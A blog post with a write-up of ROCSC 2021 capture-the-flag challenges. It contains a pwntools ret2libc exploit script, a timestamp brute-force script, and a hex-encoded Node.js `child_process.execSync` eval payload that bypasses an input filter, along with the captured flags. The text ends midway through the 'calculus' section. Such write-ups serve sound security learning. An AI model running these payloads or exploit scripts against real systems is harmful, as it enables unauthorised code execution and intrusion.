<!DOCTYPE html><html class="appearance-dark" lang="en"><head><meta charset="UTF-8"><title>ROCSC</title><meta name="description" content="This is Ischyros blog where he posts cyber security topics and sheets"><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><!-- Google Analytics --><!-- End Google Analytics -->
<!-- Baidu Analytics --><!-- End Baidu Analytics --><link rel="icon" href="/images/ISC.png"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><link rel="stylesheet" href="/style/common/jquery.fancybox.min.css"><script src="/js/highlight.pack.js"></script><meta name="description" content="

ROCSC 2021Writeupcan-you-jump(210): PwnProof of FlagCTF{70dd83585c9e2656c8a391b7dbc1f28e8d40a98067fdb56adfb69b8e509481df}
SummaryWe get a 64-bit executable, not stripped which we need to pwn.After some analysis we see that just NX is enabled so we can’t use shellcode for this exploit.


After running the program we can see that it’s leaking a printf() ad.."><meta name="generator" content="Hexo 6.3.0"></head><body class="is-flex is-flex-direction-column"><header class="header-widget is-flex-shrink-0 is-hidden-mobile"><div class="container is-fullhd is-flex is-justify-content-space-between is-align-items-center is-full-height"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">Ischyr's blog</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">ROCSC</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">Click back to the top</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/about">About</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></aside></div></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/about">About</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ROCSC-2021"><span class="toc-text">ROCSC 2021</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Writeup"><span class="toc-text">Writeup</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#can-you-jump-210-Pwn"><span class="toc-text">can-you-jump(210): Pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#what-to-do-1000-Misc"><span class="toc-text">what-to-do(1000): Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-1"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-1"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-1"><span class="toc-text">Proof of Solving</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#n4twork-urg3nt-investigation-200-Forensics"><span class="toc-text">n4twork urg3nt investigation(200): Forensics</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-2"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-2"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-2"><span class="toc-text">Proof of Solving</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#old-tickets-250-Web"><span class="toc-text">old-tickets(250): Web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-3"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-3"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-3"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-1"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#inodat-300-Web"><span class="toc-text">inodat(300): Web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-4"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-4"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-4"><span class="toc-text">Proof of Solving</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#clueless-investigation-290-Rev"><span class="toc-text">clueless_investigation(290): Rev</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-5"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-5"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-5"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-2"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#calculus-300-Web"><span class="toc-text">calculus(300): Web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-6"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-6"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-6"><span class="toc-text">Proof of Solving</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#file-crawler-50-Web"><span class="toc-text">file-crawler(50): Web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-7"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-7"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-7"><span class="toc-text">Proof of Solving</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Little-endian-photo-340-Forensics"><span class="toc-text">Little-endian-photo(340): Forensics</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-8"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-8"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-8"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-3"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#reccon-160-Web"><span class="toc-text">reccon(160): Web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-9"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-9"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-9"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-4"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RGB-led-matrix-320-Misc"><span class="toc-text">RGB_led_matrix(320): Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-10"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-10"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-10"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-5"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#OLED-380-Misc"><span class="toc-text">OLED(380): Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-11"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-11"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-11"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-6"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#speed-50-Rev"><span class="toc-text">speed(50): Rev</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-12"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-12"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-12"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-7"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#where-do-you-go-300-Misc"><span class="toc-text">where-do-you-go(300): Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-13"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-13"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-13"><span class="toc-text">Proof of Solving</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Code-8"><span class="toc-text">Proof of Code</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ultra-crawl-210-Web"><span class="toc-text">ultra-crawl(210): Web</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-14"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-14"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-14"><span class="toc-text">Proof of Solving</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#el-picasso-150-Rev"><span class="toc-text">el-picasso(150): Rev</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Flag-15"><span class="toc-text">Proof of Flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Summary-15"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Solving-15"><span class="toc-text">Proof of Solving</span></a></li></ol></li></ol></li></ol></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/CTF"><i class="tag post-item-tag">CTF</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">ROCSC</h1><time class="has-text-grey" datetime="2021-12-08T18:36:03.000Z">2021-12-08</time><article class="mt-2 post-content"><img src="/2021/12/08/rocsc-2021/CAMPIONAT.jpg" class="">

<h1 id="ROCSC-2021"><a href="#ROCSC-2021" class="headerlink" title="ROCSC 2021"></a>ROCSC 2021</h1><h1 id="Writeup"><a href="#Writeup" class="headerlink" title="Writeup"></a>Writeup</h1><h2 id="can-you-jump-210-Pwn"><a href="#can-you-jump-210-Pwn" class="headerlink" title="can-you-jump(210): Pwn"></a>can-you-jump(210): Pwn</h2><h4 id="Proof-of-Flag"><a href="#Proof-of-Flag" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{70dd83585c9e2656c8a391b7dbc1f28e8d40a98067fdb56adfb69b8e509481df}</p>
<h4 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a>Summary</h4><p>We get a 64-bit executable, not stripped which we need to pwn.<br>After some analysis we see that just <strong>NX</strong> is enabled so we can’t use shellcode for this exploit.</p>
<img src="/2021/12/08/rocsc-2021/20210830133007.png" class="">

<p>After running the program we can see that it’s leaking a <strong>printf()</strong> address, so it’s pretty abvious that we need to do some kind of <strong>ret2libc</strong>.</p>
<img src="/2021/12/08/rocsc-2021/20210830133151.png" class="">

<p>The method I chose is <strong>ret2gadget</strong> because this method seemed pretty easy.<br>Because they gave us the libc I guess on the server <strong>ASLR</strong> is <strong>1</strong> so we need to calculate the addresses with this ideea in mind.</p>
<p>Another way of solving this and the intended one is <strong>JOP</strong> -&gt; Jump Oriented Programming or another way that I found is <strong>re2libc</strong> with <strong>write(1, read@got, $value_of_rdi)</strong> and after that it’s a <strong>ret2libc</strong> with the leak of <strong>read</strong> and after that you do the normal exploit.</p>
<h4 id="Proof-of-Solving"><a href="#Proof-of-Solving" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><img src="/2021/12/08/rocsc-2021/20210830133856.png" class="">

<h4 id="Proof-of-Code"><a href="#Proof-of-Code" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">from pwn import *
#context.log_level&#x3D;&#39;DEBUG&#39;

p &#x3D; process(&quot;.&#x2F;can-you-jump&quot;)
libc &#x3D; ELF(&quot;.&#x2F;libc-2.27.so&quot;, checksec&#x3D;False)

def start():
        if not args.REMOTE:
                return process(&quot;.&#x2F;can-you-jump&quot;)
        else:
                return remote(&quot;34.141.31.183&quot;, 30217)

p &#x3D; start()

def main():

        global rop

        print(p.recvuntil(&quot;Printf() address : &quot;))
        leak &#x3D; int(p.recvline(), 16)
        print(hex(leak))

        libc.address &#x3D; leak - libc.symbols[&#39;printf&#39;]
        print(hex(libc.address))

        payload &#x3D; &quot;&quot;
        payload +&#x3D; &quot;A&quot;*72
        payload +&#x3D; p64(libc.address + 0x00000000000008aa)
        payload +&#x3D; p64(libc.address + 0x4f432)

        p.sendline(payload)

        p.interactive()

if __name__&#x3D;&#x3D;&quot;__main__&quot;:
        main()</code></pre>

<h2 id="what-to-do-1000-Misc"><a href="#what-to-do-1000-Misc" class="headerlink" title="what-to-do(1000): Misc"></a>what-to-do(1000): Misc</h2><h4 id="Proof-of-Flag-1"><a href="#Proof-of-Flag-1" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><img src="/2021/12/08/rocsc-2021/20210830135119.png" class="">

<h4 id="Summary-1"><a href="#Summary-1" class="headerlink" title="Summary"></a>Summary</h4><p>We get a couple of questions and we need to solve them in order to pass the challenge and get the full points.</p>
<h4 id="Proof-of-Solving-1"><a href="#Proof-of-Solving-1" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><ol>
<li><p>Which cyber attack tricks users to think that their working stations are infected with malware in order to download malicious software?</p>
<ul>
<li><code>scareware</code></li>
</ul>
</li>
<li><p>In some cases the cyber criminals are gathering information about targets before executing malicious actions. What do we call this type of attack strategy?</p>
<ul>
<li><code>spearphishing</code></li>
</ul>
</li>
<li><p>Which tool is one of the most popular when collecting OSINT intelligence?</p>
<ul>
<li><code>maltego</code></li>
</ul>
</li>
<li><p>From which library can we import functions like printf, scanf, fgets, gets, open, fopen, malloc, free when we want to write a C program?</p>
<ul>
<li><code>libc</code></li>
</ul>
</li>
<li><p>What else a cheater can use to alter games values on a Windows platform?</p>
<ul>
<li><code>cheatengine</code></li>
</ul>
</li>
<li><p>Which is one of the most popular tools used in reverse engineering Android applications?</p>
<ul>
<li><code>apktool</code></li>
</ul>
</li>
<li><p>What type of malware is a program that can continuously replicate itself which causes the infestation of multiple hosts in a very short period of time?</p>
<ul>
<li><code>worm</code></li>
</ul>
</li>
<li><p>What do we call the process which randomizes a set of data in such a way that no algorithm pattern can be deducted?</p>
<ul>
<li><code>entropy</code></li>
</ul>
</li>
<li><p>Which security standard assures that organizations are handling credit card data in a secure manner in order to prevent money fraud and identity theft?</p>
<ul>
<li><code>pcidss</code></li>
</ul>
</li>
<li><p>This type of cyber fraud usually involves use of telephony to execute further phishing attacks?</p>
<ul>
<li><code>vishing</code></li>
</ul>
</li>
<li><p>Which tool is very useful in CTF contests when we need to analyze binaries to discover executable code &amp; embedded files?</p>
<ul>
<li><code>binwalk</code></li>
</ul>
</li>
<li><p>This utility is used to dump TCP traffic on Linux, Windows, Solaris, etc hosts?</p>
<ul>
<li><code>tcpdump</code></li>
</ul>
</li>
<li><p>What is one of the oldest and simplest ciphers that humanity used in the past?</p>
<ul>
<li><code>caesar</code></li>
</ul>
</li>
<li><p>Which function do we use when we want to map arbitrary size data to fixed sized data?</p>
<ul>
<li><code>hashing</code></li>
</ul>
</li>
<li><p>In which country Enigma cipher was developed?</p>
<ul>
<li><code>Germany</code></li>
</ul>
</li>
<li><p>Which framework was developed by security specialists used in penetration tests to assess web applications vulnerabilities?</p>
<ul>
<li><code>w3af</code></li>
</ul>
</li>
<li><p>Which web vulnerability occurs when an application reveals pieces of data to the end-user that shouldn’t be public?</p>
<ul>
<li><code>informationleakage</code></li>
</ul>
</li>
<li><p>What do we call the set of rules which monitors and filters the traffic from the Internet and a web application to protect it from different types of cyber attacks like XSS, SQL injection, etc?</p>
<ul>
<li><code>waf</code></li>
</ul>
</li>
<li><p>What is the name of the security incident that occurs when an attacker obtains access to user data?</p>
<ul>
<li><code>databreach</code></li>
</ul>
</li>
<li><p>Which is one of the most popular Python libraries that are used most Ã®n CTF contests to develop exploits for the found vulnerabilities?</p>
<ul>
<li><code>pwntools</code></li>
</ul>
</li>
</ol>
<h2 id="n4twork-urg3nt-investigation-200-Forensics"><a href="#n4twork-urg3nt-investigation-200-Forensics" class="headerlink" title="n4twork urg3nt investigation(200): Forensics"></a>n4twork urg3nt investigation(200): Forensics</h2><h4 id="Proof-of-Flag-2"><a href="#Proof-of-Flag-2" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><img src="/2021/12/08/rocsc-2021/20210830140045.png" class="">

<h4 id="Summary-2"><a href="#Summary-2" class="headerlink" title="Summary"></a>Summary</h4><p>We get a couple of questions and we need to solve them in order to pass the challenge and get the full points.<br>The only strange this is that the questions are in <strong>Pikalang</strong> so we need to decode them in order to get the original text message.<br>We can do that by using <a target="_blank" rel="noopener" href="https://www.dcode.fr/pikalang-language">https://www.dcode.fr/pikalang-language</a></p>
<h4 id="Proof-of-Solving-2"><a href="#Proof-of-Solving-2" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><ol>
<li><p>   What is the esoteric programming language used by the attacker?</p>
<ul>
<li><code>pikalang</code></li>
</ul>
</li>
<li><p>What is the name of the tool used by the security analyst?</p>
<ul>
<li><code>networkminer</code></li>
</ul>
</li>
<li><p>What is the IP of the Linux compromised machine?</p>
<ul>
<li><code>10.20.230.192</code></li>
</ul>
</li>
<li><p>We know that the attacker also ordered a pizza from the compromised host. Can you please tell us the place, we want to contact them, maybe they can give us the necessary files?</p>
<ul>
<li><code>www.pizzahut.ro</code></li>
</ul>
</li>
</ol>
<h2 id="old-tickets-250-Web"><a href="#old-tickets-250-Web" class="headerlink" title="old-tickets(250): Web"></a>old-tickets(250): Web</h2><h4 id="Proof-of-Flag-3"><a href="#Proof-of-Flag-3" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><h4 id="Summary-3"><a href="#Summary-3" class="headerlink" title="Summary"></a>Summary</h4><p>We got a simple webserver named as <strong>ticket system</strong></p>
<h4 id="Proof-of-Solving-3"><a href="#Proof-of-Solving-3" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>After poking with the application and finding nothing I decided to change the request method to POST.</p>
<img src="/2021/12/08/rocsc-2021/20210830212340.png" class="">

<p>We forword the request and we got this</p>
<img src="/2021/12/08/rocsc-2021/20210830212520.png" class="">

<p>After looking at the errors we find that we can bruteforce the code by timestamp and <strong>POST</strong> it with <em>code</em> request method.</p>
<img src="/2021/12/08/rocsc-2021/20210830212701.png" class="">

<h4 id="Proof-of-Code-1"><a href="#Proof-of-Code-1" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">#!&#x2F;usr&#x2F;bin&#x2F;python
import requests
import hashlib
import time
from bs4 import BeautifulSoup

url &#x3D; &quot;http:&#x2F;&#x2F;35.246.178.49:30980&quot;

def main():
        timestamp &#x3D; 1628168161 + 162
        while True:
                code &#x3D; hashlib.md5(str(timestamp).encode()).hexdigest()
                r &#x3D; requests.post(url, data&#x3D;&#123;&quot;code&quot;: code&#125;)
                content &#x3D; r.text

                if(&quot;ctf&quot; in content):
                        soup &#x3D; BeautifulSoup(r.text, &quot;html.parser&quot;)
                        print(soup.find_all(&quot;p&quot;)[-1].text.strip().split()[-1])
                        break

                timestamp +&#x3D; 1

if __name__&#x3D;&#x3D;&quot;__main__&quot;:
        main()</code></pre>

<h2 id="inodat-300-Web"><a href="#inodat-300-Web" class="headerlink" title="inodat(300): Web"></a>inodat(300): Web</h2><h4 id="Proof-of-Flag-4"><a href="#Proof-of-Flag-4" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{11a0aafa059bda95fdb80332309eb6368ddf4e572dadbe0c40dfe0be69bf515d}</p>
<h4 id="Summary-4"><a href="#Summary-4" class="headerlink" title="Summary"></a>Summary</h4><p>We get a basic API webserver.</p>
<h4 id="Proof-of-Solving-4"><a href="#Proof-of-Solving-4" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>We start with our basic enumeration and we find that it haves <strong>&#x2F;api&#x2F;v1</strong><br>So we scan again the <strong>&#x2F;api&#x2F;v1</strong> and we find the <strong>math</strong>.<br>Now we need to <strong>FUZZ</strong> math in order to find the <em>parameter</em><br>Until now everything looks almost the same like the challenge <em>CALCULUS</em><br>So I tried using the payload I had for <em>CALCULUS</em>, but on this one we don’t need the <strong>this.constructor.constructor</strong> part.</p>
<p>MAIN PAYLOAD:</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript">require(&quot;child_process&quot;).execSync(&quot;ls&quot;).toString()</code></pre>

<p>ENCODED PAYLOAD:</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript">eval(Buffer.from(&#39;7265717569726528226368696c645f70726f6365737322292e6578656353796e632822636174207365637265745f666c61675f666f6c6465725f6164736173646f68692f666c61672e74787422292e746f537472696e672829&#39;,+&#39;hex&#39;).toString(&#39;ascii&#39;))</code></pre>

<p>But you can see that by using the MAIN payload it’s giving us a TRY HARDER !</p>
<img src="/2021/12/08/rocsc-2021/20210830171928.png" class="">

<p>So the only thing that we can do is to encode the payload.<br>I tried multiple encoding <em>techniques</em> but none work except <em>hex</em>.</p>
<img src="/2021/12/08/rocsc-2021/20210830172025.png" class="">

<p>So in order to run the <em>hex</em> payload we need a method to run it in javascript.<br>In the first result on google we can see how to do that with <strong>eval()</strong></p>
<p>So after running the <strong>ls</strong> command we can see that flag is under **secret_flag_folder_adsasdohi ** folder.</p>
<img src="/2021/12/08/rocsc-2021/20210830172148.png" class="">

<h2 id="clueless-investigation-290-Rev"><a href="#clueless-investigation-290-Rev" class="headerlink" title="clueless_investigation(290): Rev"></a>clueless_investigation(290): Rev</h2><h4 id="Proof-of-Flag-5"><a href="#Proof-of-Flag-5" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{8ab6d5fe901104ead00fde56cb4766e4821bc7a7e3975f023f3130b690f8f7bb}</p>
<h4 id="Summary-5"><a href="#Summary-5" class="headerlink" title="Summary"></a>Summary</h4><p>We get an x-sharelib, and a message encoded in <strong>morse code</strong><br>After decoding the message we get: <code>YJLEFYWFKQVUCOEWEPKBLHBKHRBKLOUXVNFP</code></p>
<h4 id="Proof-of-Solving-5"><a href="#Proof-of-Solving-5" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>The binary is performing couple of checks on the given message, performing a custom encoding with strong dependency of the algorithm of Railfence cipher, but then the algorithm here differes a bit, first it changes the underscore to the chr(120), then change the string read from the message.txt file, making the string uppercase and then mapping the value by adding the value of ord(“A”) to character one by one, keeping the characters limited to 26 alphabetic character, then on the global array, it assigns the needed value which acts as indexing for encoding the message, provided changing the message taking the mapped array for substitution.<br>I got the global_array by using a custom docker where I runned <code>gdb-gef</code> and compared the inital string with what the output was mapping each char.</p>
<h4 id="Proof-of-Code-2"><a href="#Proof-of-Code-2" class="headerlink" title="Proof of Code"></a>Proof of Code</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python">#!&#x2F;usr&#x2F;bin&#x2F;python

def decryptRailFence(cipher, key):

    rail &#x3D; [[&#39;\n&#39; for i in range(len(cipher))]
                  for j in range(key)]

    dir_down &#x3D; None
    row, col &#x3D; 0, 0

    for i in range(len(cipher)):
        if row &#x3D;&#x3D; 0:
            dir_down &#x3D; True
        if row &#x3D;&#x3D; key - 1:
            dir_down &#x3D; False

        rail[row][col] &#x3D; &#39;*&#39;
        col +&#x3D; 1

        if dir_down:
            row +&#x3D; 1
        else:
            row -&#x3D; 1

    index &#x3D; 0
    for i in range(key):
        for j in range(len(cipher)):
            if ((rail[i][j] &#x3D;&#x3D; &#39;*&#39;) and
               (index &lt; len(cipher))):
                rail[i][j] &#x3D; cipher[index]
                index +&#x3D; 1

    result &#x3D; []
    row, col &#x3D; 0, 0
    for i in range(len(cipher)):

        if row &#x3D;&#x3D; 0:
            dir_down &#x3D; True
        if row &#x3D;&#x3D; key-1:
            dir_down &#x3D; False

        if (rail[row][col] !&#x3D; &#39;*&#39;):
            result.append(rail[row][col])
            col +&#x3D; 1

        if dir_down:
            row +&#x3D; 1
        else:
            row -&#x3D; 1
    return(&quot;&quot;.join(result))

if __name__&#x3D;&#x3D;&quot;__main__&quot;:
        global_array &#x3D; [0,8,16,24,32,1,7,9,15,17,23,25,31,33,2,6,10,14,18,22,26,30,34,3,5,11,13,19,21,27,29,35,4,12,20,28]

        org &#x3D; &quot;YJLEFYWFKQVUCOEWEPKBLHBKHRBKLOUXVNFP&quot;
        org &#x3D; [x for x in org]
        ceva &#x3D; decryptRailFence(org, 5)

        offset_upper &#x3D; ord(&quot;Z&quot;) - ord(&quot;A&quot;)
        offset_lower &#x3D; ord(&quot;z&quot;) - ord(&quot;a&quot;)
        ord_A &#x3D; ord(&quot;A&quot;)

        result &#x3D; [0]* len(global_array)
        final &#x3D; &quot;AIXVUAAIXVW&quot;
        for i in range(len(global_array)):
                if i &lt; 26:
                        offset_upper &#x3D; org[global_array.index(i)]
                        offset_upper &#x3D; ord(offset_upper) - ord(&quot;A&quot;)
                        offset_upper &#x3D; (offset_upper + i) % 26
                        offset_upper &#x3D; 25 - offset_upper
                        offset_upper &#x3D; chr(offset_upper + ord(&quot;A&quot;))
                        result[i] &#x3D; offset_upper
                else:
                        offset_upper &#x3D; org[global_array.index(i)]
                        offset_upper &#x3D; ord(offset_upper) - ord(&quot;A&quot;)
                        f &#x3D; ord(final[i % 26]) - ord(&quot;A&quot;)
                        offset_upper &#x3D; 25 - offset_upper
                        offset_upper &#x3D; (offset_upper + f) % 26
                        offset_upper &#x3D; chr(offset_upper + ord(&quot;A&quot;))
                        result[i] &#x3D; offset_upper

        print(&quot;&quot;.join(result).replace(&quot;X&quot;, &quot;_&quot;))</code></pre>

<h2 id="calculus-300-Web"><a href="#calculus-300-Web" class="headerlink" title="calculus(300): Web"></a>calculus(300): Web</h2><h4 id="Proof-of-Flag-6"><a href="#Proof-of-Flag-6" class="headerlink" title="Proof of Flag"></a>Proof of Flag</h4><p>CTF{de71c185bcc37c8b169f7bb4c1c0bd3c7fe041110ae4d176434d396c2de52121}</p>
<h4 id="Summary-6"><a href="#Summary-6" class="headerlink" title="Summary"></a>Summary</h4><p>We get a <strong>web calculator</strong> which should do some basic arithmetic calculations.<br>We can see that if we try to press a button or something it’s not working so I started to guess the parameter for the calculator to work.</p>
<h4 id="Proof-of-Solving-6"><a href="#Proof-of-Solving-6" class="headerlink" title="Proof of Solving"></a>Proof of Solving</h4><p>After poking with it for a little bit we found the <strong>&#x2F;sum?</strong> parameter. We enter it and we can see an error <code>result: &quot;Missing a,b!!&quot;</code></p>
<img src="/2021/12/08/rocsc-2021/20210830141811.png" class="">

<p>We add the parameters and we can see that it’s doing some basic “sum” but as you can see it’s not really doing it, for example <strong>1+1&#x3D;2</strong> it’s doing <strong>1+1&#x3D;11</strong></p>
<img src="/2021/12/08/rocsc-2021/20210830142049.png" class="">

<p>So that means in the <strong>backend</strong> it’s using <strong>eval()</strong><br>So in order to get the flag we need to bypass the <strong>eval()</strong>.</p>
